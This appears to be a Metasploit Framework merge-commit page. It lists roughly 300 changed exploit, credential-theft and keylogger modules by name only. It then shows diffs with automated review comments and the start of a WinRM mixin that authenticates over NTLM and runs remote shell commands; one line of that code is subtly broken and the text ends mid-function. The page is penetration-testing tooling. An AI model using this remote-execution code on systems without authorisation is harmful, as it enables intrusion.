Merge branch 'master' into release

commit 67d0367ab7ebb692e15173a1407b3093fc846995 2 parents d9503e6 + 357fd1b
Tod Beardsley todb authored
Showing with 2,062 additions and 403 deletions.
  1. +2 −2 lib/msf/core/db_manager.rb
  2. +3 −0  lib/msf/core/exploit/mixins.rb
  3. +424 −0 lib/msf/core/exploit/winrm.rb
  4. +1 −2  lib/msf/core/handler/bind_tcp.rb
  5. +33 −32 lib/msf/core/module/author.rb
  6. +3 −0  lib/rex/io/stream_abstraction.rb
  7. +9 −2 lib/rex/post/meterpreter/client.rb
  8. +15 −0 lib/rex/text.rb
  9. +0 −2  modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb
  10. +1 −1  modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
  11. +1 −1  modules/auxiliary/admin/http/typo3_sa_2009_002.rb
  12. +0 −1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
  13. +0 −1  modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
  14. +5 −0 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
  15. +2 −3 modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
  16. +1 −1  modules/auxiliary/admin/zend/java_bridge.rb
  17. +1 −1  modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb
  18. +1 −1  modules/auxiliary/dos/hp/data_protector_rds.rb
  19. +1 −1  modules/auxiliary/dos/http/apache_mod_isapi.rb
  20. +1 −1  modules/auxiliary/dos/http/apache_range_dos.rb
  21. +1 −1  modules/auxiliary/dos/http/sonicwall_ssl_format.rb
  22. +0 −1  modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb
  23. +1 −2  modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb
  24. +1 −1  modules/auxiliary/dos/windows/ftp/solarftp_user.rb
  25. +1 −1  modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb
  26. +1 −1  modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
  27. +1 −1  modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
  28. +1 −1  modules/auxiliary/dos/windows/tftp/solarwinds.rb
  29. +1 −1  modules/auxiliary/gather/d20pass.rb
  30. +1 −1  modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
  31. +1 −1  modules/auxiliary/scanner/h323/h323_version.rb
  32. +1 −1  modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
  33. +1 −1  modules/auxiliary/scanner/http/axis_local_file_include.rb
  34. +1 −1  modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
  35. +91 −0 modules/auxiliary/scanner/http/clansphere_traversal.rb
  36. +1 −1  modules/auxiliary/scanner/http/ektron_cms400net.rb
  37. +1 −1  modules/auxiliary/scanner/http/enum_wayback.rb
  38. +1 −1  modules/auxiliary/scanner/http/httpbl_lookup.rb
  39. +1 −1  modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
  40. +1 −1  modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
  41. 0  modules/auxiliary/scanner/http/{manageengine_traversal.rb → manageengine_deviceexpert_traversal.rb}
  42. +92 −0 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
  43. +2 −2 modules/auxiliary/scanner/http/nginx_source_disclosure.rb
  44. +2 −2 modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
  45. +1 −1  modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
  46. +2 −2 modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
  47. +2 −0  modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
  48. +2 −0  modules/auxiliary/scanner/smb/smb_version.rb
  49. +1 −1  modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
  50. +1 −1  modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
  51. +64 −0 modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
  52. +79 −0 modules/auxiliary/scanner/winrm/winrm_login.rb
  53. +1 −1  modules/auxiliary/server/capture/drda.rb
  54. +1 −2  modules/auxiliary/server/http_ntlmrelay.rb
  55. +1 −1  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
  56. +1 −1  modules/auxiliary/spoof/dns/bailiwicked_host.rb
  57. +1 −1  modules/auxiliary/vsploit/pii/web_pii.rb
  58. +1 −1  modules/encoders/x86/context_cpuid.rb
  59. +1 −1  modules/exploits/freebsd/tacacs/xtacacsd_report.rb
  60. +1 −1  modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
  61. +1 −0  modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
  62. +2 −2 modules/exploits/linux/http/webid_converter.rb
  63. +1 −1  modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
  64. +1 −0  modules/exploits/linux/local/sock_sendpage.rb
  65. +2 −1  modules/exploits/linux/local/udev_netlink.rb
  66. +3 −3 modules/exploits/linux/misc/lprng_format_string.rb
  67. +1 −1  modules/exploits/linux/misc/netsupport_manager_agent.rb
  68. +2 −2 modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb
  69. +1 −1  modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
  70. +1 −1  modules/exploits/multi/fileformat/peazip_command_injection.rb
  71. +2 −2 modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
  72. +1 −1  modules/exploits/multi/http/familycms_less_exec.rb
  73. +4 −4 modules/exploits/multi/http/jboss_bshdeployer.rb
  74. +4 −4 modules/exploits/multi/http/jboss_deploymentfilerepository.rb
  75. +4 −4 modules/exploits/multi/http/jboss_maindeployer.rb
  76. +272 −0 modules/exploits/multi/http/manageengine_search_sqli.rb
  77. +1 −1  modules/exploits/multi/http/openfire_auth_bypass.rb
  78. +1 −1  modules/exploits/multi/http/phpldapadmin_query_engine.rb
  79. +1 −1  modules/exploits/multi/http/phpscheduleit_start_date.rb
  80. +1 −1  modules/exploits/multi/http/plone_popen2.rb
  81. +1 −1  modules/exploits/multi/http/pmwiki_pagelist.rb
  82. +1 −1  modules/exploits/multi/http/qdpm_upload_exec.rb
  83. +2 −2 modules/exploits/multi/http/struts_code_exec.rb
  84. +2 −2 modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
  85. +1 −0  modules/exploits/multi/http/testlink_upload_exec.rb
  86. +3 −3 modules/exploits/multi/http/tomcat_mgr_deploy.rb
  87. +1 −1  modules/exploits/multi/http/traq_plugin_exec.rb
  88. +1 −1  modules/exploits/multi/http/vbseo_proc_deutf.rb
  89. +8 −2 modules/exploits/multi/http/webpagetest_upload_exec.rb
  90. +1 −1  modules/exploits/multi/misc/zend_java_bridge.rb
  91. +1 −1  modules/exploits/osx/http/evocam_webserver.rb
  92. +1 −1  modules/exploits/osx/misc/ufo_ai.rb
  93. +1 −1  modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb
  94. +1 −1  modules/exploits/solaris/sunrpc/ypupdated_exec.rb
  95. +1 −0  modules/exploits/unix/local/setuid_nmap.rb
  96. +1 −1  modules/exploits/unix/webapp/awstats_migrate_exec.rb
  97. +1 −1  modules/exploits/unix/webapp/coppermine_piceditor.rb
  98. +1 −1  modules/exploits/unix/webapp/dogfood_spell_exec.rb
  99. +1 −1  modules/exploits/unix/webapp/joomla_tinybrowser.rb
  100. +2 −2 modules/exploits/unix/webapp/openx_banner_edit.rb
  101. +1 −1  modules/exploits/unix/webapp/sphpblog_file_upload.rb
  102. +1 −0  modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
  103. +1 −0  modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
  104. +2 −2 modules/exploits/unix/webapp/twiki_history.rb
  105. +2 −2 modules/exploits/unix/webapp/twiki_search.rb
  106. +1 −0  modules/exploits/unix/webapp/xoda_file_upload.rb
  107. +1 −1  modules/exploits/windows/browser/adobe_flash_otf_font.rb
  108. +1 −1  modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb
  109. +1 −1  modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
  110. +1 −1  modules/exploits/windows/browser/chilkat_crypt_writefile.rb
  111. +1 −1  modules/exploits/windows/browser/communicrypt_mail_activex.rb
  112. +1 −1  modules/exploits/windows/browser/dxstudio_player_exec.rb
  113. +1 −1  modules/exploits/windows/browser/greendam_url.rb
  114. +2 −2 modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
  115. +2 −2 modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
  116. +1 −1  modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
  117. +2 −2 modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
  118. +1 −1  modules/exploits/windows/browser/ms09_043_owc_msdso.rb
  119. +1 −1  modules/exploits/windows/browser/ms10_090_ie_css_clip.rb
  120. +1 −1  modules/exploits/windows/browser/novelliprint_callbackurl.rb
  121. +1 −1  modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
  122. +1 −1  modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
  123. +1 −1  modules/exploits/windows/browser/real_arcade_installerdlg.rb
  124. +1 −1  modules/exploits/windows/browser/trendmicro_extsetowner.rb
  125. +1 −1  modules/exploits/windows/browser/ultraoffice_httpupload.rb
  126. +2 −2 modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
  127. +1 −1  modules/exploits/windows/browser/webex_ucf_newobject.rb
  128. +1 −1  modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
  129. +2 −2 modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb
  130. +1 −1  modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb
  131. +1 −1  modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
  132. +1 −1  modules/exploits/windows/fileformat/aol_desktop_linktag.rb
  133. +1 −1  modules/exploits/windows/fileformat/aol_phobos_bof.rb
  134. +1 −1  modules/exploits/windows/fileformat/audio_wkstn_pls.rb
  135. +1 −1  modules/exploits/windows/fileformat/audiotran_pls.rb
  136. +1 −1  modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
  137. +1 −1  modules/exploits/windows/fileformat/bsplayer_m3u.rb
  138. +1 −1  modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb
  139. +1 −1  modules/exploits/windows/fileformat/csound_getnum_bof.rb
  140. +1 −1  modules/exploits/windows/fileformat/digital_music_pad_pls.rb
  141. +1 −1  modules/exploits/windows/fileformat/djstudio_pls_bof.rb
  142. +1 −1  modules/exploits/windows/fileformat/dvdx_plf_bof.rb
  143. +1 −1  modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
  144. +2 −2 modules/exploits/windows/fileformat/ezip_wizard_bof.rb
  145. +1 −1  modules/exploits/windows/fileformat/fatplayer_wav.rb
  146. +3 −3 modules/exploits/windows/fileformat/feeddemon_opml.rb
  147. +1 −1  modules/exploits/windows/fileformat/foxit_reader_launch.rb
  148. +1 −1  modules/exploits/windows/fileformat/foxit_title_bof.rb
  149. +2 −2 modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
  150. +1 −1  modules/exploits/windows/fileformat/galan_fileformat_bof.rb
  151. +1 −1  modules/exploits/windows/fileformat/gta_samp.rb
  152. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
  153. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
  154. +2 −2 modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
  155. +4 −4 modules/exploits/windows/fileformat/ideal_migration_ipj.rb
  156. +1 −1  modules/exploits/windows/fileformat/microp_mppl.rb
  157. +2 −2 modules/exploits/windows/fileformat/millenium_mp3_pls.rb
  158. +2 −2 modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
  159. +1 −1  modules/exploits/windows/fileformat/mplayer_sami_bof.rb
  160. +1 −1  modules/exploits/windows/fileformat/ms12_005.rb
  161. +1 −1  modules/exploits/windows/fileformat/mymp3player_m3u.rb
  162. +0 −1  modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
  163. +1 −1  modules/exploits/windows/fileformat/orbital_viewer_orb.rb
  164. +2 −2 modules/exploits/windows/fileformat/proshow_cellimage_bof.rb
  165. +1 −1  modules/exploits/windows/fileformat/real_networks_netzip_bof.rb
  166. +1 −1  modules/exploits/windows/fileformat/scadaphone_zip.rb
  167. +1 −1  modules/exploits/windows/fileformat/somplplayer_m3u.rb
  168. +1 −1  modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb
  169. +1 −1  modules/exploits/windows/fileformat/tugzip.rb
  170. +1 −1  modules/exploits/windows/fileformat/ultraiso_ccd.rb
  171. +1 −1  modules/exploits/windows/fileformat/ultraiso_cue.rb
  172. +1 −1  modules/exploits/windows/fileformat/varicad_dwb.rb
  173. +1 −1  modules/exploits/windows/fileformat/vlc_realtext.rb
  174. +1 −1  modules/exploits/windows/fileformat/vlc_smb_uri.rb
  175. +1 −1  modules/exploits/windows/fileformat/wireshark_packet_dect.rb
  176. +1 −1  modules/exploits/windows/fileformat/wm_downloader_m3u.rb
  177. +1 −1  modules/exploits/windows/fileformat/xenorate_xpl_bof.rb
  178. +3 −3 modules/exploits/windows/fileformat/xion_m3u_sehbof.rb
  179. +1 −1  modules/exploits/windows/ftp/ability_server_stor.rb
  180. +1 −1  modules/exploits/windows/ftp/absolute_ftp_list_bof.rb
  181. +2 −2 modules/exploits/windows/ftp/easyftp_list_fixret.rb
  182. +2 −2 modules/exploits/windows/ftp/easyftp_mkd_fixret.rb
  183. +1 −1  modules/exploits/windows/ftp/goldenftp_pass_bof.rb
  184. +1 −1  modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb
  185. +1 −1  modules/exploits/windows/ftp/sasser_ftpd_port.rb
  186. +1 −1  modules/exploits/windows/ftp/scriptftp_list.rb
  187. +1 −1  modules/exploits/windows/ftp/trellian_client_pasv.rb
  188. +2 −4 modules/exploits/windows/ftp/turboftp_port.rb
  189. +1 −1  modules/exploits/windows/ftp/vermillion_ftpd_port.rb
  190. +1 −1  modules/exploits/windows/ftp/xftp_client_pwd.rb
  191. +1 −0  modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
  192. +1 −1  modules/exploits/windows/http/bea_weblogic_post_bof.rb
  193. +1 −1  modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
  194. +2 −2 modules/exploits/windows/http/cyclope_ess_sqli.rb
  195. +1 −1  modules/exploits/windows/http/easyftp_list.rb
  196. +1 −1  modules/exploits/windows/http/kolibri_http.rb
  197. +1 −1  modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb
  198. +2 −2 modules/exploits/windows/http/oracle_btm_writetofile.rb
  199. +1 −1  modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
  200. +2 −2 modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
  201. +2 −2 modules/exploits/windows/http/umbraco_upload_aspx.rb
  202. +3 −3 modules/exploits/windows/iis/iis_webdav_upload_asp.rb
  203. +1 −1  modules/exploits/windows/iis/ms01_026_dbldecode.rb
  204. +1 −1  modules/exploits/windows/iis/ms02_065_msadc.rb
  205. +4 −4 modules/exploits/windows/iis/msadc.rb
  206. +6 −5 modules/exploits/windows/local/ask.rb
  207. +8 −5 modules/exploits/windows/local/bypassuac.rb
  208. +4 −3 modules/exploits/windows/local/current_user_psexec.rb
  209. +4 −2 modules/exploits/windows/local/ms10_092_schelevator.rb
  210. +2 −2 modules/exploits/windows/local/ms11_080_afdjoinleaf.rb
  211. +2 −2 modules/exploits/windows/local/service_permissions.rb
  212. +2 −0  modules/exploits/windows/local/trusted_service_path.rb
  213. +2 −2 modules/exploits/windows/misc/bigant_server_250.rb
  214. +2 −2 modules/exploits/windows/misc/bigant_server_usv.rb
  215. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
  216. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
  217. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
  218. +1 −1  modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
  219. +1 −1  modules/exploits/windows/misc/eureka_mail_err.rb
  220. +1 −1  modules/exploits/windows/misc/gimp_script_fu.rb
  221. +1 −1  modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
  222. +1 −1  modules/exploits/windows/misc/hp_omniinet_4.rb
  223. +209 −0 modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
  224. +209 −0 modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
  225. +1 −1  modules/exploits/windows/misc/mini_stream.rb
  226. +1 −1  modules/exploits/windows/misc/nettransport.rb
  227. +1 −1  modules/exploits/windows/misc/splayer_content_type.rb
  228. +1 −1  modules/exploits/windows/misc/stream_down_bof.rb
  229. +1 −1  modules/exploits/windows/misc/ufo_ai.rb
  230. +1 −1  modules/exploits/windows/misc/wireshark_packet_dect.rb
  231. +2 −2 modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
  232. +1 −1  modules/exploits/windows/scada/codesys_web_server.rb
  233. +1 −1  modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
  234. +20 −2 modules/exploits/windows/smb/ms08_067_netapi.rb
  235. +1 −1  modules/exploits/windows/smtp/njstar_smtp_bof.rb
  236. +1 −1  modules/exploits/windows/smtp/wmailserver.rb
  237. +1 −1  modules/exploits/windows/ssh/sysax_ssh_username.rb
  238. +1 −1  modules/exploits/windows/ssl/ms04_011_pct.rb
  239. +1 −1  modules/exploits/windows/tftp/attftp_long_filename.rb
  240. +1 −1  modules/exploits/windows/wins/ms04_045_wins.rb
  241. +4 −0 modules/payloads/stagers/php/bind_tcp_ipv6.rb
  242. +112 −0 modules/post/multi/escalate/metasploit_pcaplog.rb
  243. +1 −1  modules/post/multi/gather/apple_ios_backup.rb
  244. +1 −1  modules/post/multi/gather/dns_bruteforce.rb
  245. +1 −1  modules/post/multi/gather/dns_reverse_lookup.rb
  246. +2 −1  modules/post/multi/gather/dns_srv_lookup.rb
  247. +1 −1  modules/post/multi/gather/enum_vbox.rb
  248. +1 −1  modules/post/multi/gather/env.rb
  249. +1 −1  modules/post/multi/gather/filezilla_client_cred.rb
  250. +1 −1  modules/post/multi/gather/find_vmx.rb
  251. +1 −1  modules/post/multi/gather/firefox_creds.rb
  252. +1 −1  modules/post/multi/gather/multi_command.rb
  253. +1 −1  modules/post/multi/gather/pidgin_cred.rb
  254. +1 −1  modules/post/multi/gather/ping_sweep.rb
  255. +1 −1  modules/post/multi/gather/run_console_rc_file.rb
  256. +1 −1  modules/post/multi/gather/skype_enum.rb
  257. +1 −1  modules/post/multi/general/close.rb
  258. +1 −1  modules/post/multi/general/execute.rb
  259. +2 −2 modules/post/multi/manage/multi_post.rb
  260. +1 −1  modules/post/multi/manage/sudo.rb
  261. +1 −0  modules/post/osx/gather/enum_adium.rb
  262. +2 −1  modules/post/osx/gather/enum_osx.rb
  263. +2 −1  modules/post/osx/gather/hashdump.rb
  264. +1 −1  modules/post/windows/capture/keylog_recorder.rb
  265. +2 −2 modules/post/windows/capture/lockout_keylogger.rb
  266. +4 −4 modules/post/windows/escalate/bypassuac.rb
  267. +2 −2 modules/post/windows/escalate/droplnk.rb
  268. +1 −1  modules/post/windows/escalate/getsystem.rb
  269. +2 −2 modules/post/windows/escalate/ms10_073_kbdlayout.rb
  270. +2 −2 modules/post/windows/escalate/ms10_092_schelevator.rb
  271. +2 −2 modules/post/windows/escalate/net_runtime_modify.rb
  272. +1 −1  modules/post/windows/escalate/screen_unlock.rb
  273. +2 −1  modules/post/windows/escalate/service_permissions.rb
  274. +2 −1  modules/post/windows/gather/arp_scanner.rb
  275. +2 −1  modules/post/windows/gather/bitcoin_jacker.rb
  276. +5 −2 modules/post/windows/gather/cachedump.rb
  277. +1 −1  modules/post/windows/gather/checkvm.rb
  278. +2 −1  modules/post/windows/gather/credentials/coreftp.rb
  279. +2 −1  modules/post/windows/gather/credentials/credential_collector.rb
  280. +1 −0  modules/post/windows/gather/credentials/dyndns.rb
  281. +1 −1  modules/post/windows/gather/credentials/enum_cred_store.rb
  282. +2 −1  modules/post/windows/gather/credentials/enum_picasa_pwds.rb
  283. +2 −1  modules/post/windows/gather/credentials/epo_sql.rb
  284. +1 −1  modules/post/windows/gather/credentials/filezilla_server.rb
  285. +3 −1 modules/post/windows/gather/credentials/flashfxp.rb
  286. +2 −1  modules/post/windows/gather/credentials/ftpnavigator.rb
  287. +3 −2 modules/post/windows/gather/credentials/gpp.rb
  288. +2 −1  modules/post/windows/gather/credentials/idm.rb
  289. +2 −1  modules/post/windows/gather/credentials/imail.rb
  290. +3 −2 modules/post/windows/gather/credentials/imvu.rb
  291. +2 −1  modules/post/windows/gather/credentials/meebo.rb
  292. +3 −2 modules/post/windows/gather/credentials/mremote.rb
  293. +2 −1  modules/post/windows/gather/credentials/nimbuzz.rb
  294. +3 −2 modules/post/windows/gather/credentials/outlook.rb
  295. +2 −1  modules/post/windows/gather/credentials/razorsql.rb
  296. +1 −1  modules/post/windows/gather/credentials/smartftp.rb
  297. +2 −1  modules/post/windows/gather/credentials/tortoisesvn.rb
  298. +3 −1 modules/post/windows/gather/credentials/total_commander.rb
  299. +3 −1 modules/post/windows/gather/credentials/trillian.rb
  300. +6 −3 modules/post/windows/gather/credentials/vnc.rb
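--- a/lib/msf/core/db_manager.rb
+++ b/lib/msf/core/db_manager.rb
@@ -588,8 +588,8 @@ def search_modules(search_string, inclusive=false)
 where_v << [ xv, xv ]
 when 'os','platform'
 xv = "%#{kv}%"
-where_q << ' ( module_targets.name ILIKE ? ) '
-where_v << [ xv ]
+where_q << ' ( module_platforms.name ILIKE ? OR module_targets.name ILIKE ? ) '
+where_v << [ xv, xv ]
 when 'port'
 # TODO
 when 'type'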
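Review bot: The new predicate on the `where_q <<` line references `module_platforms.name`, but the part of search_modules that assembles the FROM/JOIN list lies outside this hunk, so it is worth confirming that `module_platforms` is actually joined into the statement; if it is not, the 'os'/'platform' search fails at query execution rather than being caught when the module loads. The search values remain bound through `?` placeholders, so the change introduces no string-built SQL. A one-line comment above the new line, `# match either the declared platform or a target name`, would explain why the term is checked against two tables.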
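--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -88,3 +88,6 @@
 # WBEM
 require 'msf/core/exploit/wbemexec'
+#WinRM
+require 'msf/core/exploit/winrm'
+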
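Review bot: The added comment `#WinRM` drops the space that the neighbouring `# WBEM` comment uses; `# WinRM` keeps the file's style. The third added line is a trailing empty line at end of file, which looks unintentional.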
424 lib/msf/core/exploit/winrm.rb
@@ -0,0 +1,424 @@
+# -*- coding: binary -*-
+require 'uri'
+require 'digest'
+require 'rex/proto/ntlm/crypt'
+require 'rex/proto/ntlm/constants'
+require 'rex/proto/ntlm/utils'
+require 'rex/proto/ntlm/exceptions'
+
+module Msf
+module Exploit::Remote::WinRM
+ include Exploit::Remote::NTLM::Client
+ include Exploit::Remote::HttpClient
+ #
+ # Constants
+ #
+ NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
+ NTLM_CONST ||= Rex::Proto::NTLM::Constants
+ NTLM_UTILS ||= Rex::Proto::NTLM::Utils
+ NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
+ def initialize(info = {})
+ super
+ register_options(
+ [
+ Opt::RPORT(5985),
+ OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
+ OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
+ OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
+ OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ]),
+ ], self.class
+ )
+
+ register_autofilter_ports([ 80,443,5985,5986 ])
+ register_autofilter_services(%W{ winrm })
+ end
+
+ def winrm_poke(timeout = 20)
+ opts = {
+ 'uri' => datastore['URI'],
+ 'data' => Rex::Text.rand_text_alpha(8)
+ }
+ c = connect(opts)
+ to = opts[:timeout] || timeout
+ ctype = "application/soap+xml;charset=UTF-8"
+ resp, c = send_request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'data' => opts['data']
+ }), to)
+ return resp
+ end
+
+ def parse_auth_methods(resp)
+ return [] unless resp and resp.code == 401
+ methods = []
+ methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
+ methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
+ methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
+ return methods
+ end
+
+ def winrm_run_cmd(cmd, timeout=20)
+ resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+ if resp.code == 401
+ print_error "Login failure! Recheck supplied credentials."
+ return resp .code
+ end
+ unless resp.code == 200
+ print_error "Got unexpected response: \n #{resp.to_s}"
+ retval == resp.code || 0
+ return retval
+ end
+ shell_id = winrm_get_shell_id(resp)
+ resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+ cmd_id = winrm_get_cmd_id(resp)
+ resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+ streams = winrm_get_cmd_streams(resp)
+ resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
+ resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
+ return streams
+ end
+
+ def winrm_wql_msg(wql)
+ action = winrm_uri_action("wql")
+ contents = winrm_header(action) + winrm_wql_body(wql)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_open_shell_msg
+ action = winrm_uri_action("create_shell")
+ options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
+ header_data = action + options
+ contents = winrm_header(header_data) + winrm_open_shell_body
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_cmd_msg(cmd,shell_id)
+ action = winrm_uri_action("send_cmd")
+ options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + options + selectors
+ contents = winrm_header(header_data) + winrm_cmd_body(cmd)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_cmd_recv_msg(shell_id,cmd_id)
+ action = winrm_uri_action("recv_cmd")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_terminate_cmd_msg(shell_id,cmd_id)
+ action = winrm_uri_action("signal_shell")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def winrm_delete_shell_msg(shell_id)
+ action = winrm_uri_action("delete_shell")
+ selectors = winrm_selector_set([['ShellId', shell_id]])
+ header_data = action + selectors
+ contents = winrm_header(header_data) + winrm_empty_body
+ msg = winrm_envelope(contents)
+ return msg
+ end
+
+ def parse_wql_response(response)
+ xml = response.body
+ columns = []
+ rows =[]
+ rxml = REXML::Document.new(xml).root
+ items = rxml.elements["///w:Items"]
+ items.elements.to_a("///w:XmlFragment").each do |node|
+ row_data = []
+ node.elements.to_a.each do |sub_node|
+ columns << sub_node.name
+ row_data << sub_node.text
+ end
+ rows << row_data
+ end
+ columns.uniq!
+ response_data = Rex::Ui::Text::Table.new(
+ 'Header' => "#{datastore['WQL']} (#{rhost})",
+ 'Indent' => 1,
+ 'Columns' => columns
+ )
+ rows.each do |row|
+ response_data << row
+ end
+ return response_data
+ end
+
+ def winrm_get_shell_id(response)
+ xml = response.body
+ shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
+ end
+
+ def winrm_get_cmd_id(response)
+ xml = response.body
+ cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
+ end
+
+ def winrm_get_cmd_streams(response)
+ streams = {
+ 'stdout' => '',
+ 'stderr' => '',
+ }
+ xml = response.body
+ rxml = REXML::Document.new(xml).root
+ rxml.elements.to_a("//rsp:Stream").each do |node|
+ next if node.text.nil?
+ streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
+ end
+ return streams
+ end
+
+ def generate_uuid
+ ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
+ end
+
+ def send_request_ntlm(data, timeout = 20)
+ opts = {
+ 'uri' => datastore['URI'],
+ 'data' => data,
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD']
+ }
+ ntlm_options = {
+ :signing => false,
+ :usentlm2_session => datastore['NTLM::UseNTLM2_session'],
+ :use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
+ :send_lm => datastore['NTLM::SendLM'],
+ :send_ntlm => datastore['NTLM::SendNTLM']
+ }
+ ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
+ workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+ domain_name = datastore['DOMAIN']
+ ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
+ workstation_name,
+ ntlmssp_flags))
+ to = opts[:timeout] || timeout
+ begin
+ c = connect(opts)
+ ctype = "application/soap+xml;charset=UTF-8"
+ # First request to get the challenge
+ r = c.request_cgi(opts.merge({
+ 'uri' => opts['uri'],
+ 'method' => 'POST',
+ 'ctype' => ctype,
+ 'headers' => { 'Authorization' => ntlm_message_1},
